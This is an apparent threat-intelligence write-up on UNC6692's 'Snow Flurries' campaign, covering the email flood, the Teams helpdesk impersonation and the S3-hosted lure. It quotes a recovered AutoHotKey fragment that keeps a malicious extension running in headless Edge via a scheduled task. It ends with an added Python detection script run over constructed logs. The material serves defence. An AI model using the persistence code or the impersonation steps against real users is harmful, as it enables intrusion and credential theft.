Deconstructing Snow Flurries: A Step-by-Step Breakdown of UNC6692's Social Engineering Attack


Introduction

In late December 2025, the threat group UNC6692 executed a sophisticated, multi-stage intrusion campaign that combined relentless social engineering, custom malware, and a malicious browser extension. This guide dissects each phase of their attack—from the initial email flood to establishing persistence—so you can understand the mechanics and bolster your defenses. The attackers impersonated IT helpdesk staff, exploited trust in enterprise software, and used a clever AutoHotKey trick to deploy their tools. Follow along to see how each step unfolded.

Source: www.mandiant.com

Step-by-Step Attack Breakdown

Step 1: Overwhelm the Target with an Email Campaign

UNC6692 began by bombarding the victim’s inbox with a large volume of emails. This wasn’t a typical phishing blast; the goal was to create urgency and distraction. The sheer number of messages made it hard for the victim to distinguish legitimate communications from noise. This set the stage for the next, more targeted contact.

Step 2: Impersonate IT Helpdesk via Microsoft Teams

Shortly after the email deluge, an attacker using an external Teams account reached out to the victim, posing as helpdesk staff. They offered to help resolve the “email spam problem” the victim was experiencing. The message included a link to what was described as a local patch that would prevent further spamming. The victim, already stressed by the email flood, was more likely to trust this unsolicited help.

Step 3: Deliver the Malicious Link (HTML Page)

The link sent via Teams pointed to an HTML page hosted on the attacker’s AWS S3 bucket:

https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com

The page displayed a convincing update prompt, such as “Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming.” When the victim clicked, the HTML page initiated a download of two files: a renamed AutoHotKey binary and an AutoHotKey script with the same filename. The binary was named identically to the script so that when executed, AutoHotKey would automatically run the script without needing extra command-line arguments.

Step 4: Execute the AutoHotKey Script for Initial Reconnaissance

Once the victim ran the downloaded file, the AutoHotKey script executed immediately. Mandiant could not recover the original script, but evidence shows it performed initial reconnaissance commands and then proceeded to install the SNOWBELT browser extension. The script also checked if Microsoft Edge was running in headless mode (likely to avoid detection) and ensured persistence mechanisms were in place.

Step 5: Install SNOWBELT – A Malicious Chromium Extension

The script installed the SNOWBELT browser extension into Chromium-based browsers (like Edge). This extension was not available through the Chrome Web Store; it was loaded from a local path. SNOWBELT allowed attackers to monitor browser activity, steal credentials, or perform man-in-the-browser attacks. The extension ran even when the browser was launched in --headless=new mode, making it hard to spot.


Step 6: Establish Persistence via Startup Folder

To ensure SNOWBELT stayed active across reboots, the AutoHotKey script added a shortcut to itself in the Windows Startup folder. This shortcut launched the AutoHotKey script again, which in turn verified that the extension was running and that a scheduled task existed.

Step 7: Schedule a Task for Continuous Monitoring

The script also created a scheduled task that periodically checked if SNOWBELT was still active. If the extension was missing, the task would re-launch it. The code snippet recovered from the campaign shows:

if !CheckHeadlessEdge(){
   try{
      taskService:=ComObject("Schedule.Service")
      taskService.Connect()
      rootFolder:=taskService.GetFolder("\")
      if FindAndRunTask(rootFolder){
         Sleep 10000
         if CheckHeadlessEdge(){
            ExitApp
         }
      }
   }
   Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft

This code launches Microsoft Edge in headless mode with the SNOWBELT extension loaded. The scheduled task and startup shortcut together made removal difficult for the victim.
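The steps above leave a small set of host-side traces a defender can hunt for: a dropper whose PE version resource still says it is AutoHotKey even though the file was renamed (Step 3), a .lnk written into the per-user Startup folder by something other than Explorer (Step 6), a scheduled task registered through the Task Scheduler COM API rather than schtasks.exe (Step 7), and Edge started with --headless=new plus --load-extension (Steps 5 and 7). The detection script below is an added example written for this article; it is not code from Mandiant or from the campaign. It runs over a handful of constructed JSON-lines events shaped like Sysmon Event ID 1 (process creation) and 11 (file creation) and Windows Security event 4698 (scheduled task created). The filename SpamFilterUpdate.exe, the user jdoe, the extension path and the task name are invented for the sample; the assumption that AutoHotKey builds carry an OriginalFileName beginning with "AutoHotkey" is flagged in the code.

```python
"""Hunting rules for the SNOWBELT-style persistence chain described above.

Added example, not the article's or Mandiant's code. Events are constructed
JSON lines in the shape of Sysmon EventID 1/11 and Security event 4698.
"""
import json
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Finding:
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_renamed_autohotkey(ev: Dict) -> Optional[Finding]:
    """Step 3: renamed AutoHotKey dropper. Sysmon's OriginalFileName is read from the
    PE version resource, which renaming the file does not change. Assumption: AutoHotKey
    releases set that field to a name starting with 'AutoHotkey'."""
    if ev.get("EventID") != 1:
        return None
    original = ev.get("OriginalFileName", "").lower()
    image = _basename(ev.get("Image", ""))
    if original.startswith("autohotkey") and image != original:
        return Finding("renamed_autohotkey",
                       f"{ev['Image']} carries OriginalFileName {ev['OriginalFileName']}")
    return None


def rule_headless_edge_extension(ev: Dict) -> Optional[Finding]:
    """Steps 5 and 7: Edge launched headless with a side-loaded extension, matching the
    shape of the recovered Run command (--headless=new plus --load-extension)."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "msedge.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if "--headless" in cmd and "--load-extension=" in cmd:
        m = re.search(r'--load-extension=(?:"([^"]*)"|(\S+))', cmd)
        ext_path = (m.group(1) or m.group(2)) if m else "?"
        return Finding("headless_edge_sideloaded_extension", f"extension path {ext_path}")
    return None


def rule_startup_shortcut(ev: Dict) -> Optional[Finding]:
    """Step 6: a .lnk created in the per-user Startup folder (Sysmon FileCreate) by a
    process other than Explorer, which is how a user would normally add one."""
    if ev.get("EventID") != 11:
        return None
    target = ev.get("TargetFilename", "")
    in_startup = re.search(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", target, re.IGNORECASE)
    if in_startup and _basename(ev.get("Image", "")) != "explorer.exe":
        return Finding("startup_folder_shortcut", f"{ev['Image']} wrote {target}")
    return None


def rule_scheduled_task_headless_edge(ev: Dict) -> Optional[Finding]:
    """Step 7: the snippet registers its task via the Schedule.Service COM object, so no
    schtasks.exe command line exists to catch. Security event 4698 carries the task XML."""
    if ev.get("EventID") != 4698:
        return None
    content = ev.get("TaskContent", "")
    if "msedge.exe" in content.lower() and "--load-extension" in content:
        return Finding("scheduled_task_headless_edge",
                       f"task {ev.get('TaskName')} launches Edge with a side-loaded extension")
    return None


RULES = [rule_renamed_autohotkey, rule_headless_edge_extension,
         rule_startup_shortcut, rule_scheduled_task_headless_edge]


def scan(lines: List[str]) -> List[Finding]:
    """Apply every rule to every JSON event; rules are independent, so one event may fire several."""
    findings: List[Finding] = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        findings.extend(f for f in (rule(ev) for rule in RULES) if f)
    return findings


EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
DROPPER = r"C:\Users\jdoe\Downloads\SpamFilterUpdate.exe"  # constructed filename
EXT = r"C:\Users\jdoe\AppData\Local\Microsoft\ext"         # constructed extension path

# Constructed sample telemetry: one benign Edge launch followed by the four artefacts.
SAMPLE_LOGS = [json.dumps(e) for e in [
    {"EventID": 1, "Image": EDGE, "OriginalFileName": "msedge.exe",
     "CommandLine": f'"{EDGE}" --profile-directory=Default', "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": DROPPER, "OriginalFileName": "AutoHotkey.exe",
     "CommandLine": f'"{DROPPER}"', "ParentImage": EDGE},
    {"EventID": 11, "Image": DROPPER,
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SpamFilterUpdate.lnk"},
    {"EventID": 4698, "TaskName": r"\SpamFilterUpdate",
     "TaskContent": f"<Task><Exec><Command>{EDGE}</Command>"
                    f'<Arguments>--headless=new --load-extension="{EXT}"</Arguments></Exec></Task>'},
    {"EventID": 1, "Image": EDGE, "OriginalFileName": "msedge.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'"{EDGE}" --user-data-dir="C:\\Users\\jdoe\\AppData\\Local\\Microsoft\\Edge\\System Data" '
                    f'--headless=new --load-extension="{EXT}"'},
]]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.rule}] {f.detail}")
```

Each rule keys on a property the attacker cannot cheaply change without altering the technique: the version resource survives a rename, the Startup folder and the task registration are the persistence itself, and the extension only works when --load-extension is on the command line. The benign first event produces no finding, which is the false-positive check worth keeping when the rules are ported to a SIEM.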
